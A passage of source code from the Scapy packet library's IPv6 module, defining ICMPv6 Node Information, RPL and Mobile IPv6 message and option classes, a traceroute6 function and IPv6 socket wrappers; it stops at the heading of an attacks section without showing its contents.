2727            t, val = x
2728            if t == 2:  # DNS names
2729                ttl, tmp_len = val
2730                tmp_len = dnsrepr2names(tmp_len)
2731                names_list = (plain_str(name) for name in tmp_len)
2732                return "ttl:%d %s" % (ttl, ",".join(names_list))
2733            elif t == 3 or t == 4:
2734                return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val)))  # noqa: E501
2735            return repr(val)
2736        return repr(x)  # XXX should not happen
2737
2738# By default, sent responses have code set to 0 (successful)
2739
2740
2741class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
2742    name = "ICMPv6 Node Information Reply - NOOP Reply"
2743    fields_desc = [ByteEnumField("type", 140, icmp6types),
2744                   ByteEnumField("code", 0, _nireply_code),
2745                   XShortField("cksum", None),
2746                   ShortEnumField("qtype", 0, icmp6_niqtypes),
2747                   BitField("unused", 0, 10),
2748                   FlagsField("flags", 0, 6, "TACLSG"),
2749                   NonceField("nonce", None),
2750                   NIReplyDataField("data", None)]
2751
2752
2753class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
2754    name = "ICMPv6 Node Information Reply - Node Names"
2755    qtype = 2
2756
2757
2758class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
2759    name = "ICMPv6 Node Information Reply - IPv6 addresses"
2760    qtype = 3
2761
2762
2763class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
2764    name = "ICMPv6 Node Information Reply - IPv4 addresses"
2765    qtype = 4
2766
2767
2768class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
2769    name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
2770    code = 1
2771
2772
2773class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
2774    name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
2775    code = 2
2776
2777
2778def _niquery_guesser(p):
2779    cls = conf.raw_layer
2780    type = orb(p[0])
2781    if type == 139:  # Node Info Query specific stuff
2782        if len(p) > 6:
2783            qtype, = struct.unpack("!H", p[4:6])
2784            cls = {0: ICMPv6NIQueryNOOP,
2785                   2: ICMPv6NIQueryName,
2786                   3: ICMPv6NIQueryIPv6,
2787                   4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer)
2788    elif type == 140:  # Node Info Reply specific stuff
2789        code = orb(p[1])
2790        if code == 0:
2791            if len(p) > 6:
2792                qtype, = struct.unpack("!H", p[4:6])
2793                cls = {2: ICMPv6NIReplyName,
2794                       3: ICMPv6NIReplyIPv6,
2795                       4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP)
2796        elif code == 1:
2797            cls = ICMPv6NIReplyRefuse
2798        elif code == 2:
2799            cls = ICMPv6NIReplyUnknown
2800    return cls
2801
2802
2803#############################################################################
2804#############################################################################
2805#     Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550)      #
2806#############################################################################
2807#############################################################################
2808
2809# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
2810rplcodes = {0: "DIS",
2811            1: "DIO",
2812            2: "DAO",
2813            3: "DAO-ACK",
2814            # 4: "P2P-DRO",
2815            # 5: "P2P-DRO-ACK",
2816            # 6: "Measurement",
2817            7: "DCO",
2818            8: "DCO-ACK"}
2819
2820
2821class ICMPv6RPL(_ICMPv6):   # RFC 6550
2822    name = 'RPL'
2823    fields_desc = [ByteEnumField("type", 155, icmp6types),
2824                   ByteEnumField("code", 0, rplcodes),
2825                   XShortField("cksum", None)]
2826    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}
2827
2828
2829#############################################################################
2830#############################################################################
2831#               Mobile IPv6 (RFC 3775) and Nemo (RFC 3963)                  #
2832#############################################################################
2833#############################################################################
2834
2835# Mobile IPv6 ICMPv6 related classes
2836
2837class ICMPv6HAADRequest(_ICMPv6):
2838    name = 'ICMPv6 Home Agent Address Discovery Request'
2839    fields_desc = [ByteEnumField("type", 144, icmp6types),
2840                   ByteField("code", 0),
2841                   XShortField("cksum", None),
2842                   XShortField("id", None),
2843                   BitEnumField("R", 1, 1, {1: 'MR'}),
2844                   XBitField("res", 0, 15)]
2845
2846    def hashret(self):
2847        return struct.pack("!H", self.id) + self.payload.hashret()
2848
2849
2850class ICMPv6HAADReply(_ICMPv6):
2851    name = 'ICMPv6 Home Agent Address Discovery Reply'
2852    fields_desc = [ByteEnumField("type", 145, icmp6types),
2853                   ByteField("code", 0),
2854                   XShortField("cksum", None),
2855                   XShortField("id", None),
2856                   BitEnumField("R", 1, 1, {1: 'MR'}),
2857                   XBitField("res", 0, 15),
2858                   IP6ListField('addresses', None)]
2859
2860    def hashret(self):
2861        return struct.pack("!H", self.id) + self.payload.hashret()
2862
2863    def answers(self, other):
2864        if not isinstance(other, ICMPv6HAADRequest):
2865            return 0
2866        return self.id == other.id
2867
2868
2869class ICMPv6MPSol(_ICMPv6):
2870    name = 'ICMPv6 Mobile Prefix Solicitation'
2871    fields_desc = [ByteEnumField("type", 146, icmp6types),
2872                   ByteField("code", 0),
2873                   XShortField("cksum", None),
2874                   XShortField("id", None),
2875                   XShortField("res", 0)]
2876
2877    def _hashret(self):
2878        return struct.pack("!H", self.id)
2879
2880
2881class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
2882    name = 'ICMPv6 Mobile Prefix Advertisement'
2883    fields_desc = [ByteEnumField("type", 147, icmp6types),
2884                   ByteField("code", 0),
2885                   XShortField("cksum", None),
2886                   XShortField("id", None),
2887                   BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
2888                   XBitField("res", 0, 14)]
2889
2890    def hashret(self):
2891        return struct.pack("!H", self.id)
2892
2893    def answers(self, other):
2894        return isinstance(other, ICMPv6MPSol)
2895
2896# Mobile IPv6 Options classes
2897
2898
2899_mobopttypes = {2: "Binding Refresh Advice",
2900                3: "Alternate Care-of Address",
2901                4: "Nonce Indices",
2902                5: "Binding Authorization Data",
2903                6: "Mobile Network Prefix (RFC3963)",
2904                7: "Link-Layer Address (RFC4068)",
2905                8: "Mobile Node Identifier (RFC4283)",
2906                9: "Mobility Message Authentication (RFC4285)",
2907                10: "Replay Protection (RFC4285)",
2908                11: "CGA Parameters Request (RFC4866)",
2909                12: "CGA Parameters (RFC4866)",
2910                13: "Signature (RFC4866)",
2911                14: "Home Keygen Token (RFC4866)",
2912                15: "Care-of Test Init (RFC4866)",
2913                16: "Care-of Test (RFC4866)"}
2914
2915
2916class _MIP6OptAlign(Packet):
2917    """ Mobile IPv6 options have alignment requirements of the form x*n+y.
2918    This class is inherited by all MIPv6 options to help in computing the
2919    required Padding for that option, i.e. the need for a Pad1 or PadN
2920    option before it. They only need to provide x and y as class
2921    parameters. (x=0 and y=0 are used when no alignment is required)"""
2922
2923    __slots__ = ["x", "y"]
2924
2925    def alignment_delta(self, curpos):
2926        x = self.x
2927        y = self.y
2928        if x == 0 and y == 0:
2929            return 0
2930        delta = x * ((curpos - y + x - 1) // x) + y - curpos
2931        return delta
2932
2933    def extract_padding(self, p):
2934        return b"", p
2935
2936
2937class MIP6OptBRAdvice(_MIP6OptAlign):
2938    name = 'Mobile IPv6 Option - Binding Refresh Advice'
2939    fields_desc = [ByteEnumField('otype', 2, _mobopttypes),
2940                   ByteField('olen', 2),
2941                   ShortField('rinter', 0)]
2942    x = 2
2943    y = 0  # alignment requirement: 2n
2944
2945
2946class MIP6OptAltCoA(_MIP6OptAlign):
2947    name = 'MIPv6 Option - Alternate Care-of Address'
2948    fields_desc = [ByteEnumField('otype', 3, _mobopttypes),
2949                   ByteField('olen', 16),
2950                   IP6Field("acoa", "::")]
2951    x = 8
2952    y = 6  # alignment requirement: 8n+6
2953
2954
2955class MIP6OptNonceIndices(_MIP6OptAlign):
2956    name = 'MIPv6 Option - Nonce Indices'
2957    fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
2958                   ByteField('olen', 16),
2959                   ShortField('hni', 0),
2960                   ShortField('coni', 0)]
2961    x = 2
2962    y = 0  # alignment requirement: 2n
2963
2964
2965class MIP6OptBindingAuthData(_MIP6OptAlign):
2966    name = 'MIPv6 Option - Binding Authorization Data'
2967    fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
2968                   ByteField('olen', 16),
2969                   BitField('authenticator', 0, 96)]
2970    x = 8
2971    y = 2  # alignment requirement: 8n+2
2972
2973
2974class MIP6OptMobNetPrefix(_MIP6OptAlign):  # NEMO - RFC 3963
2975    name = 'NEMO Option - Mobile Network Prefix'
2976    fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
2977                   ByteField("olen", 18),
2978                   ByteField("reserved", 0),
2979                   ByteField("plen", 64),
2980                   IP6Field("prefix", "::")]
2981    x = 8
2982    y = 4  # alignment requirement: 8n+4
2983
2984
2985class MIP6OptLLAddr(_MIP6OptAlign):  # Sect 6.4.4 of RFC 4068
2986    name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
2987    fields_desc = [ByteEnumField("otype", 7, _mobopttypes),
2988                   ByteField("olen", 7),
2989                   ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
2990                   ByteField("pad", 0),
2991                   MACField("lla", ETHER_ANY)]  # Only support ethernet
2992    x = 0
2993    y = 0  # alignment requirement: none
2994
2995
2996class MIP6OptMNID(_MIP6OptAlign):  # RFC 4283
2997    name = "MIPv6 Option - Mobile Node Identifier"
2998    fields_desc = [ByteEnumField("otype", 8, _mobopttypes),
2999                   FieldLenField("olen", None, length_of="id", fmt="B",
3000                                 adjust=lambda pkt, x: x + 1),
3001                   ByteEnumField("subtype", 1, {1: "NAI"}),
3002                   StrLenField("id", "",
3003                               length_from=lambda pkt: pkt.olen - 1)]
3004    x = 0
3005    y = 0  # alignment requirement: none
3006
3007# We only support decoding and basic build. Automatic HMAC computation is
3008# too much work for our current needs. It is left to the user (I mean ...
3009# you). --arno
3010
3011
3012class MIP6OptMsgAuth(_MIP6OptAlign):  # RFC 4285 (Sect. 5)
3013    name = "MIPv6 Option - Mobility Message Authentication"
3014    fields_desc = [ByteEnumField("otype", 9, _mobopttypes),
3015                   FieldLenField("olen", None, length_of="authdata", fmt="B",
3016                                 adjust=lambda pkt, x: x + 5),
3017                   ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option",  # noqa: E501
3018                                                2: "MN-AAA authentication mobility option"}),  # noqa: E501
3019                   IntField("mspi", None),
3020                   StrLenField("authdata", "A" * 12,
3021                               length_from=lambda pkt: pkt.olen - 5)]
3022    x = 4
3023    y = 1  # alignment requirement: 4n+1
3024
3025# Extracted from RFC 1305 (NTP) :
3026# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
3027# in seconds relative to 0h on 1 January 1900. The integer part is in the
3028# first 32 bits and the fraction part in the last 32 bits.
3029
3030
3031class NTPTimestampField(LongField):
3032    def i2repr(self, pkt, x):
3033        if x < ((50 * 31536000) << 32):
3034            return "Some date a few decades ago (%d)" % x
3035
3036        # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
3037        # January 1st 1970 :
3038        delta = -2209075761
3039        i = int(x >> 32)
3040        j = float(x & 0xffffffff) * 2.0**-32
3041        res = i + j + delta
3042        t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))
3043
3044        return "%s (%d)" % (t, x)
3045
3046
3047class MIP6OptReplayProtection(_MIP6OptAlign):  # RFC 4285 (Sect. 6)
3048    name = "MIPv6 option - Replay Protection"
3049    fields_desc = [ByteEnumField("otype", 10, _mobopttypes),
3050                   ByteField("olen", 8),
3051                   NTPTimestampField("timestamp", 0)]
3052    x = 8
3053    y = 2  # alignment requirement: 8n+2
3054
3055
3056class MIP6OptCGAParamsReq(_MIP6OptAlign):  # RFC 4866 (Sect. 5.6)
3057    name = "MIPv6 option - CGA Parameters Request"
3058    fields_desc = [ByteEnumField("otype", 11, _mobopttypes),
3059                   ByteField("olen", 0)]
3060    x = 0
3061    y = 0  # alignment requirement: none
3062
3063# XXX TODO: deal with CGA param fragmentation and build of defragmented
3064# XXX       version. Passing of a big CGAParam structure should be
3065# XXX       simplified. Make it hold packets, by the way  --arno
3066
3067
3068class MIP6OptCGAParams(_MIP6OptAlign):  # RFC 4866 (Sect. 5.1)
3069    name = "MIPv6 option - CGA Parameters"
3070    fields_desc = [ByteEnumField("otype", 12, _mobopttypes),
3071                   FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
3072                   StrLenField("cgaparams", "",
3073                               length_from=lambda pkt: pkt.olen)]
3074    x = 0
3075    y = 0  # alignment requirement: none
3076
3077
3078class MIP6OptSignature(_MIP6OptAlign):  # RFC 4866 (Sect. 5.2)
3079    name = "MIPv6 option - Signature"
3080    fields_desc = [ByteEnumField("otype", 13, _mobopttypes),
3081                   FieldLenField("olen", None, length_of="sig", fmt="B"),
3082                   StrLenField("sig", "",
3083                               length_from=lambda pkt: pkt.olen)]
3084    x = 0
3085    y = 0  # alignment requirement: none
3086
3087
3088class MIP6OptHomeKeygenToken(_MIP6OptAlign):  # RFC 4866 (Sect. 5.3)
3089    name = "MIPv6 option - Home Keygen Token"
3090    fields_desc = [ByteEnumField("otype", 14, _mobopttypes),
3091                   FieldLenField("olen", None, length_of="hkt", fmt="B"),
3092                   StrLenField("hkt", "",
3093                               length_from=lambda pkt: pkt.olen)]
3094    x = 0
3095    y = 0  # alignment requirement: none
3096
3097
3098class MIP6OptCareOfTestInit(_MIP6OptAlign):  # RFC 4866 (Sect. 5.4)
3099    name = "MIPv6 option - Care-of Test Init"
3100    fields_desc = [ByteEnumField("otype", 15, _mobopttypes),
3101                   ByteField("olen", 0)]
3102    x = 0
3103    y = 0  # alignment requirement: none
3104
3105
3106class MIP6OptCareOfTest(_MIP6OptAlign):  # RFC 4866 (Sect. 5.5)
3107    name = "MIPv6 option - Care-of Test"
3108    fields_desc = [ByteEnumField("otype", 16, _mobopttypes),
3109                   FieldLenField("olen", None, length_of="cokt", fmt="B"),
3110                   StrLenField("cokt", b'\x00' * 8,
3111                               length_from=lambda pkt: pkt.olen)]
3112    x = 0
3113    y = 0  # alignment requirement: none
3114
3115
3116class MIP6OptUnknown(_MIP6OptAlign):
3117    name = 'Scapy6 - Unknown Mobility Option'
3118    fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
3119                   FieldLenField("olen", None, length_of="odata", fmt="B"),
3120                   StrLenField("odata", "",
3121                               length_from=lambda pkt: pkt.olen)]
3122    x = 0
3123    y = 0  # alignment requirement: none
3124
3125    @classmethod
3126    def dispatch_hook(cls, _pkt=None, *_, **kargs):
3127        if _pkt:
3128            o = orb(_pkt[0])  # Option type
3129            if o in moboptcls:
3130                return moboptcls[o]
3131        return cls
3132
3133
3134moboptcls = {0: Pad1,
3135             1: PadN,
3136             2: MIP6OptBRAdvice,
3137             3: MIP6OptAltCoA,
3138             4: MIP6OptNonceIndices,
3139             5: MIP6OptBindingAuthData,
3140             6: MIP6OptMobNetPrefix,
3141             7: MIP6OptLLAddr,
3142             8: MIP6OptMNID,
3143             9: MIP6OptMsgAuth,
3144             10: MIP6OptReplayProtection,
3145             11: MIP6OptCGAParamsReq,
3146             12: MIP6OptCGAParams,
3147             13: MIP6OptSignature,
3148             14: MIP6OptHomeKeygenToken,
3149             15: MIP6OptCareOfTestInit,
3150             16: MIP6OptCareOfTest}
3151
3152
3153# Main Mobile IPv6 Classes
3154
3155mhtypes = {0: 'BRR',
3156           1: 'HoTI',
3157           2: 'CoTI',
3158           3: 'HoT',
3159           4: 'CoT',
3160           5: 'BU',
3161           6: 'BA',
3162           7: 'BE',
3163           8: 'Fast BU',
3164           9: 'Fast BA',
3165           10: 'Fast NA'}
3166
3167# From http://www.iana.org/assignments/mobility-parameters
3168bastatus = {0: 'Binding Update accepted',
3169               1: 'Accepted but prefix discovery necessary',
3170            128: 'Reason unspecified',
3171            129: 'Administratively prohibited',
3172            130: 'Insufficient resources',
3173            131: 'Home registration not supported',
3174            132: 'Not home subnet',
3175            133: 'Not home agent for this mobile node',
3176            134: 'Duplicate Address Detection failed',
3177            135: 'Sequence number out of window',
3178            136: 'Expired home nonce index',
3179            137: 'Expired care-of nonce index',
3180            138: 'Expired nonces',
3181            139: 'Registration type change disallowed',
3182            140: 'Mobile Router Operation not permitted',
3183            141: 'Invalid Prefix',
3184            142: 'Not Authorized for Prefix',
3185            143: 'Forwarding Setup failed (prefixes missing)',
3186            144: 'MIPV6-ID-MISMATCH',
3187            145: 'MIPV6-MESG-ID-REQD',
3188            146: 'MIPV6-AUTH-FAIL',
3189            147: 'Permanent home keygen token unavailable',
3190            148: 'CGA and signature verification failed',
3191            149: 'Permanent home keygen token exists',
3192            150: 'Non-null home nonce index expected'}
3193
3194
3195class _MobilityHeader(Packet):
3196    name = 'Dummy IPv6 Mobility Header'
3197    overload_fields = {IPv6: {"nh": 135}}
3198
3199    def post_build(self, p, pay):
3200        p += pay
3201        tmp_len = self.len
3202        if self.len is None:
3203            tmp_len = (len(p) - 8) // 8
3204        p = p[:1] + struct.pack("B", tmp_len) + p[2:]
3205        if self.cksum is None:
3206            cksum = in6_chksum(135, self.underlayer, p)
3207        else:
3208            cksum = self.cksum
3209        p = p[:4] + struct.pack("!H", cksum) + p[6:]
3210        return p
3211
3212
3213class MIP6MH_Generic(_MobilityHeader):  # Mainly for decoding of unknown msg
3214    name = "IPv6 Mobility Header - Generic Message"
3215    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3216                   ByteField("len", None),
3217                   ByteEnumField("mhtype", None, mhtypes),
3218                   ByteField("res", None),
3219                   XShortField("cksum", None),
3220                   StrLenField("msg", b"\x00" * 2,
3221                               length_from=lambda pkt: 8 * pkt.len - 6)]
3222
3223
3224class MIP6MH_BRR(_MobilityHeader):
3225    name = "IPv6 Mobility Header - Binding Refresh Request"
3226    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3227                   ByteField("len", None),
3228                   ByteEnumField("mhtype", 0, mhtypes),
3229                   ByteField("res", None),
3230                   XShortField("cksum", None),
3231                   ShortField("res2", None),
3232                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
3233                   _OptionsField("options", [], MIP6OptUnknown, 8,
3234                                 length_from=lambda pkt: 8 * pkt.len)]
3235    overload_fields = {IPv6: {"nh": 135}}
3236
3237    def hashret(self):
3238        # Hack: BRR, BU and BA have the same hashret that returns the same
3239        #       value b"\x00\x08\x09" (concatenation of mhtypes). This is
3240        #       because we need match BA with BU and BU with BRR. --arno
3241        return b"\x00\x08\x09"
3242
3243
3244class MIP6MH_HoTI(_MobilityHeader):
3245    name = "IPv6 Mobility Header - Home Test Init"
3246    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3247                   ByteField("len", None),
3248                   ByteEnumField("mhtype", 1, mhtypes),
3249                   ByteField("res", None),
3250                   XShortField("cksum", None),
3251                   StrFixedLenField("reserved", b"\x00" * 2, 2),
3252                   StrFixedLenField("cookie", b"\x00" * 8, 8),
3253                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
3254                   _OptionsField("options", [], MIP6OptUnknown, 16,
3255                                 length_from=lambda pkt: 8 * (pkt.len - 1))]
3256    overload_fields = {IPv6: {"nh": 135}}
3257
3258    def hashret(self):
3259        return bytes_encode(self.cookie)
3260
3261
3262class MIP6MH_CoTI(MIP6MH_HoTI):
3263    name = "IPv6 Mobility Header - Care-of Test Init"
3264    mhtype = 2
3265
3266    def hashret(self):
3267        return bytes_encode(self.cookie)
3268
3269
3270class MIP6MH_HoT(_MobilityHeader):
3271    name = "IPv6 Mobility Header - Home Test"
3272    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3273                   ByteField("len", None),
3274                   ByteEnumField("mhtype", 3, mhtypes),
3275                   ByteField("res", None),
3276                   XShortField("cksum", None),
3277                   ShortField("index", None),
3278                   StrFixedLenField("cookie", b"\x00" * 8, 8),
3279                   StrFixedLenField("token", b"\x00" * 8, 8),
3280                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
3281                   _OptionsField("options", [], MIP6OptUnknown, 24,
3282                                 length_from=lambda pkt: 8 * (pkt.len - 2))]
3283    overload_fields = {IPv6: {"nh": 135}}
3284
3285    def hashret(self):
3286        return bytes_encode(self.cookie)
3287
3288    def answers(self, other):
3289        if (isinstance(other, MIP6MH_HoTI) and
3290                self.cookie == other.cookie):
3291            return 1
3292        return 0
3293
3294
3295class MIP6MH_CoT(MIP6MH_HoT):
3296    name = "IPv6 Mobility Header - Care-of Test"
3297    mhtype = 4
3298
3299    def hashret(self):
3300        return bytes_encode(self.cookie)
3301
3302    def answers(self, other):
3303        if (isinstance(other, MIP6MH_CoTI) and
3304                self.cookie == other.cookie):
3305            return 1
3306        return 0
3307
3308
3309class LifetimeField(ShortField):
3310    def i2repr(self, pkt, x):
3311        return "%d sec" % (4 * x)
3312
3313
3314class MIP6MH_BU(_MobilityHeader):
3315    name = "IPv6 Mobility Header - Binding Update"
3316    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3317                   ByteField("len", None),  # unit == 8 bytes (excluding the first 8 bytes)  # noqa: E501
3318                   ByteEnumField("mhtype", 5, mhtypes),
3319                   ByteField("res", None),
3320                   XShortField("cksum", None),
3321                   XShortField("seq", None),  # TODO: ShortNonceField
3322                   FlagsField("flags", "KHA", 7, "PRMKLHA"),
3323                   XBitField("reserved", 0, 9),
3324                   LifetimeField("mhtime", 3),  # unit == 4 seconds
3325                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
3326                   _OptionsField("options", [], MIP6OptUnknown, 12,
3327                                 length_from=lambda pkt: 8 * pkt.len - 4)]
3328    overload_fields = {IPv6: {"nh": 135}}
3329
3330    def hashret(self):  # Hack: see comment in MIP6MH_BRR.hashret()
3331        return b"\x00\x08\x09"
3332
3333    def answers(self, other):
3334        if isinstance(other, MIP6MH_BRR):
3335            return 1
3336        return 0
3337
3338
3339class MIP6MH_BA(_MobilityHeader):
3340    name = "IPv6 Mobility Header - Binding ACK"
3341    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3342                   ByteField("len", None),  # unit == 8 bytes (excluding the first 8 bytes)  # noqa: E501
3343                   ByteEnumField("mhtype", 6, mhtypes),
3344                   ByteField("res", None),
3345                   XShortField("cksum", None),
3346                   ByteEnumField("status", 0, bastatus),
3347                   FlagsField("flags", "K", 3, "PRK"),
3348                   XBitField("res2", None, 5),
3349                   XShortField("seq", None),  # TODO: ShortNonceField
3350                   XShortField("mhtime", 0),  # unit == 4 seconds
3351                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
3352                   _OptionsField("options", [], MIP6OptUnknown, 12,
3353                                 length_from=lambda pkt: 8 * pkt.len - 4)]
3354    overload_fields = {IPv6: {"nh": 135}}
3355
3356    def hashret(self):  # Hack: see comment in MIP6MH_BRR.hashret()
3357        return b"\x00\x08\x09"
3358
3359    def answers(self, other):
3360        if (isinstance(other, MIP6MH_BU) and
3361            other.mhtype == 5 and
3362            self.mhtype == 6 and
3363            other.flags & 0x1 and  # Ack request flags is set
3364                self.seq == other.seq):
3365            return 1
3366        return 0
3367
3368
3369_bestatus = {1: 'Unknown binding for Home Address destination option',
3370             2: 'Unrecognized MH Type value'}
3371
3372# TODO: match Binding Error to its stimulus
3373
3374
3375class MIP6MH_BE(_MobilityHeader):
3376    name = "IPv6 Mobility Header - Binding Error"
3377    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3378                   ByteField("len", None),  # unit == 8 bytes (excluding the first 8 bytes)  # noqa: E501
3379                   ByteEnumField("mhtype", 7, mhtypes),
3380                   ByteField("res", 0),
3381                   XShortField("cksum", None),
3382                   ByteEnumField("status", 0, _bestatus),
3383                   ByteField("reserved", 0),
3384                   IP6Field("ha", "::"),
3385                   _OptionsField("options", [], MIP6OptUnknown, 24,
3386                                 length_from=lambda pkt: 8 * (pkt.len - 2))]
3387    overload_fields = {IPv6: {"nh": 135}}
3388
3389
3390_mip6_mhtype2cls = {0: MIP6MH_BRR,
3391                    1: MIP6MH_HoTI,
3392                    2: MIP6MH_CoTI,
3393                    3: MIP6MH_HoT,
3394                    4: MIP6MH_CoT,
3395                    5: MIP6MH_BU,
3396                    6: MIP6MH_BA,
3397                    7: MIP6MH_BE}
3398
3399
3400#############################################################################
3401#############################################################################
3402#                               Traceroute6                                 #
3403#############################################################################
3404#############################################################################
3405
3406class AS_resolver6(AS_resolver_riswhois):
3407    def _resolve_one(self, ip):
3408        """
3409        overloaded version to provide a Whois resolution on the
3410        embedded IPv4 address if the address is 6to4 or Teredo.
3411        Otherwise, the native IPv6 address is passed.
3412        """
3413
3414        if in6_isaddr6to4(ip):  # for 6to4, use embedded @
3415            tmp = inet_pton(socket.AF_INET6, ip)
3416            addr = inet_ntop(socket.AF_INET, tmp[2:6])
3417        elif in6_isaddrTeredo(ip):  # for Teredo, use mapped address
3418            addr = teredoAddrExtractInfo(ip)[2]
3419        else:
3420            addr = ip
3421
3422        _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
3423
3424        if asn.startswith("AS"):
3425            try:
3426                asn = int(asn[2:])
3427            except ValueError:
3428                pass
3429
3430        return ip, asn, desc
3431
3432
3433class TracerouteResult6(TracerouteResult):
3434    __slots__ = []
3435
3436    def show(self):
3437        return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"),  # TODO: ICMPv6 !  # noqa: E501
3438                                             s.hlim,
3439                                             r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" +  # noqa: E501
3440                                                       "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" +  # noqa: E501
3441                                                       "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" +  # noqa: E501
3442                                                       "{ICMPv6EchoReply:%ir,type%}")))  # noqa: E501
3443
3444    def get_trace(self):
3445        trace = {}
3446
3447        for s, r in self.res:
3448            if IPv6 not in s:
3449                continue
3450            d = s[IPv6].dst
3451            if d not in trace:
3452                trace[d] = {}
3453
3454            t = not (ICMPv6TimeExceeded in r or
3455                     ICMPv6DestUnreach in r or
3456                     ICMPv6PacketTooBig in r or
3457                     ICMPv6ParamProblem in r)
3458
3459            trace[d][s[IPv6].hlim] = r[IPv6].src, t
3460
3461        for k in trace.values():
3462            try:
3463                m = min(x for x, y in k.items() if y[1])
3464            except ValueError:
3465                continue
3466            for li in list(k):  # use list(): k is modified in the loop
3467                if li > m:
3468                    del k[li]
3469
3470        return trace
3471
3472    def graph(self, ASres=AS_resolver6(), **kargs):
3473        TracerouteResult.graph(self, ASres=ASres, **kargs)
3474
3475
3476@conf.commands.register
3477def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
3478                l4=None, timeout=2, verbose=None, **kargs):
3479    """Instant TCP traceroute using IPv6
3480    traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
3481    """
3482    if verbose is None:
3483        verbose = conf.verb
3484
3485    if l4 is None:
3486        a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport),  # noqa: E501
3487                  timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs)  # noqa: E501
3488    else:
3489        a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4,
3490                  timeout=timeout, verbose=verbose, **kargs)
3491
3492    a = TracerouteResult6(a.res)
3493
3494    if verbose:
3495        a.show()
3496
3497    return a, b
3498
3499#############################################################################
3500#############################################################################
3501#                                  Sockets                                  #
3502#############################################################################
3503#############################################################################
3504
3505
3506if not WINDOWS:
3507    from scapy.supersocket import L3RawSocket
3508
3509    class L3RawSocket6(L3RawSocket):
3510        def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):  # noqa: E501
3511            # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292)  # noqa: E501
3512            self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)  # noqa: E501
3513            self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))  # noqa: E501
3514            self.iface = iface
3515
3516
3517def IPv6inIP(dst='203.178.135.36', src=None):
3518    _IPv6inIP.dst = dst
3519    _IPv6inIP.src = src
3520    if not conf.L3socket == _IPv6inIP:
3521        _IPv6inIP.cls = conf.L3socket
3522    else:
3523        del conf.L3socket
3524    return _IPv6inIP
3525
3526
3527class _IPv6inIP(SuperSocket):
3528    dst = '127.0.0.1'
3529    src = None
3530    cls = None
3531
3532    def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):  # noqa: E501
3533        SuperSocket.__init__(self, family, type, proto)
3534        self.worker = self.cls(**args)
3535
3536    def set(self, dst, src=None):
3537        _IPv6inIP.src = src
3538        _IPv6inIP.dst = dst
3539
3540    def nonblock_recv(self):
3541        p = self.worker.nonblock_recv()
3542        return self._recv(p)
3543
3544    def recv(self, x):
3545        p = self.worker.recv(x)
3546        return self._recv(p, x)
3547
3548    def _recv(self, p, x=MTU):
3549        if p is None:
3550            return p
3551        elif isinstance(p, IP):
3552            # TODO: verify checksum
3553            if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
3554                if isinstance(p.payload, IPv6):
3555                    return p.payload
3556        return p
3557
3558    def send(self, x):
3559        return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x)  # noqa: E501
3560
3561
3562#############################################################################
3563#############################################################################
3564#                    Neighbor Discovery Protocol Attacks                    #
3565#############################################################################
3566#############################################################################
3567
